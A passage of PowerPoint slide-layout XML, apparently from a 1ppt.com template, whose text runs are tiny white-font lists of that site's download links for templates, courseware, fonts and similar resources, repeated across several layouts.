              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout42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42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42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42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43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43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43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43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43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43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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout43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43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43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43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44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44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44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44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44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44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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout44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44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44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44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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
